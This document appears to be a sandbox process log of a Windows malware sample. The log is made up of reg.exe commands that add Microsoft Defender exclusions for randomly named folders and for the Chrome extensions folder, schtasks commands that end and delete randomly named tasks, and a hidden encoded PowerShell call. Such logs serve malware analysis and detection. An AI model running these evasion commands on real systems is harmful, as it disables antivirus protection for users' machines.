- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\cmd.exe' /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "geGwWOkxF"
- '<SYSTEM32>\svchost.exe' -k secsvcs
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- '<SYSTEM32>\taskeng.exe' {7AA4DA31-7DBD-4BEB-AEAF-8477B5B79153} S-1-5-21-3150914307-1777937420-491476919-1000:mfggxsjtz\user:Interactive:[1]
- '%WINDIR%\syswow64\schtasks.exe' /run /I /tn "geGwWOkxF"
- '%WINDIR%\syswow64\cmd.exe' /C copy nul "%WINDIR%\Temp\bZRyuwsfBmzQBEkO\UrCxxtji\ChXrmUGHzCUYbayU.wsf"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BqeSnNShU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\bZRyuwsfBmzQBEkO" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BqeSnNShU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BqeSnNShU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\FuOvEdCVQSMU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\BqeSnNShU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\ubakgNfKrGKxtiSJc" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\ubakgNfKrGKxtiSJc" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "fxOgmTGKQQFjjFtehKw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WkFCWBIVEQgIRfYtF"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\lSJHxSrgcIUn" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XjhyZzwkXSWyC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\XjhyZzwkXSWyC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\SpxblGFlJmbSdphOWAR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\FuOvEdCVQSMU2" /t REG_DWORD /d 0 /reg:64
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\cVeyZFosQjUGhzVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wBXbALvWUOSFDshnC"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WkFCWBIVEQgIRfYtF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RDFQtikPOrMljWbsQ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "dHdHOseBgECDHNbxd2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "yMkiuQiWpcdBWVbpl2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yMkiuQiWpcdBWVbpl"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "yMkiuQiWpcdBWVbpl"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NAbuihGHFknHtwgvm2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "NAbuihGHFknHtwgvm2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NAbuihGHFknHtwgvm"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "NAbuihGHFknHtwgvm"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "aORhwPJxVLBYPSHRO2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "aORhwPJxVLBYPSHRO2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "aORhwPJxVLBYPSHRO"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "aORhwPJxVLBYPSHRO"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wiqEWvWjFMNIoUpei2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wiqEWvWjFMNIoUpei2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "wiqEWvWjFMNIoUpei"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yMkiuQiWpcdBWVbpl2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "wiqEWvWjFMNIoUpei"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "phXCJbNFfKHFAkdue"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "phXCJbNFfKHFAkdue2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YWRCjfVPEFpjTthuu"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HphFjGMtNmlzDvGHx"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ZMGnyHeBzdCQodLwC2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ZMGnyHeBzdCQodLwC2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ZMGnyHeBzdCQodLwC"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ZMGnyHeBzdCQodLwC"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YWRCjfVPEFpjTthuu2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "YWRCjfVPEFpjTthuu2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "YWRCjfVPEFpjTthuu"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ikqYUfzVWWDggQINN"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iqobkvCGPEVKnxlTc2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iqobkvCGPEVKnxlTc2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iqobkvCGPEVKnxlTc"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iqobkvCGPEVKnxlTc"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "phXCJbNFfKHFAkdue2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "phXCJbNFfKHFAkdue"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dHdHOseBgECDHNbxd2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dHdHOseBgECDHNbxd"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "dHdHOseBgECDHNbxd"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "QeMnyPHhRaKfKTCSe"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RDFQtikPOrMljWbsQ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RDFQtikPOrMljWbsQ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "xRNIxSvPWaKPEkioB2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "xRNIxSvPWaKPEkioB2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "xRNIxSvPWaKPEkioB"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "xRNIxSvPWaKPEkioB"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BmkxeyyvGeiwoSXcc2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BmkxeyyvGeiwoSXcc2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BmkxeyyvGeiwoSXcc"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BmkxeyyvGeiwoSXcc"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EBvoLwTpMVTXGLPhq2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EBvoLwTpMVTXGLPhq2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EBvoLwTpMVTXGLPhq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EBvoLwTpMVTXGLPhq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RDFQtikPOrMljWbsQ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QeMnyPHhRaKfKTCSe"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BQGhUwmXlamVFiNxa2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QeMnyPHhRaKfKTCSe2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BQGhUwmXlamVFiNxa2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "QeMnyPHhRaKfKTCSe2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BQGhUwmXlamVFiNxa"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BQGhUwmXlamVFiNxa"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "aYtBPhmWugczVxVmb2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "aYtBPhmWugczVxVmb2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "aYtBPhmWugczVxVmb"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WkFCWBIVEQgIRfYtF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "aYtBPhmWugczVxVmb"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cmteRgqDhvlWKuAxY2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cmteRgqDhvlWKuAxY"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cmteRgqDhvlWKuAxY"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BPsRIkWTGQDPMXIbX2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BPsRIkWTGQDPMXIbX2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BPsRIkWTGQDPMXIbX"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BPsRIkWTGQDPMXIbX"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WkFCWBIVEQgIRfYtF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "fxOgmTGKQQFjjFtehKw2"